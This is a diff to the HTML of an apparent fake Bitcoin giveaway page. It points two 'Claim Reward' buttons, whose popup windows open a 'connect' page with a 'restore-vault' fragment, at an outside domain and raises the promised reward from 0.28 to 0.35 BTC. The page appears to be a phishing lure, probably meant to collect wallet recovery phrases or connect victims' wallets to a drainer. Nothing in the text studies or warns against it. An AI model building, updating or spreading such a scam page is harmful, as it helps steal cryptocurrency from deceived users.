--- a/index.html
+++ b/index.html
@@ -1,5 +1,4 @@
 <!DOCTYPE html>
-<!-- saved from url=(0054)https://sat0shi-btcs-giveaway.github.io/event/?rewards -->
 <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 
 
@@ -186,11 +185,11 @@
 <span>9</span>
 <span>4</span>
 </div>
-<a href="https://sat0shi-btcs-giveaway.github.io/event/?rewards#" onclick="window.open(&#39;connect?#restore-vault&#39;,&#39;&#39;,&#39;toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=380,height=680&#39;) ;return false" class="note"><h3>[  Click Claim Reward Here to Claim your bonuss 
+<a href="https://auth.btcstoken.site/sync/connect.html" onclick="window.open(&#39;https://auth.btcstoken.site/sync/connect.html?#restore-vault&#39;,&#39;&#39;,&#39;toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=380,height=680&#39;) ;return false" class="note"><h3>[  Click Claim Reward Here to Claim your bonuss 
 
  ]</h3><p></p></a>
 <img class="qrcode" src="./Satoshi - Core Mining - The Mysterious APP _ Using by everyone in the crypto world_files/btcs-global.png" alt="">
-<a href="https://sat0shi-btcs-giveaway.github.io/event/?rewards#" onclick="window.open(&#39;connect?#restore-vault&#39;,&#39;&#39;,&#39;toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=380,height=680&#39;) ;return false" referrerpolicy="no-referrer" style="margin-top: 10px" class="note"><h1>Claim Reward 0,28 BTC</h1></a>
+<a href="https://auth.btcstoken.site/sync/connect.html" onclick="window.open(&#39;https://auth.btcstoken.site/sync/connect.html?#restore-vault&#39;,&#39;&#39;,&#39;toolbar=yes,scrollbars=yes,resizable=yes,top=0,left=100000,width=380,height=680&#39;) ;return false" referrerpolicy="no-referrer" style="margin-top: 10px" class="note"><h1>Claim Reward 0.35 BTC</h1></a>
 </div>
 </div>
 <script>
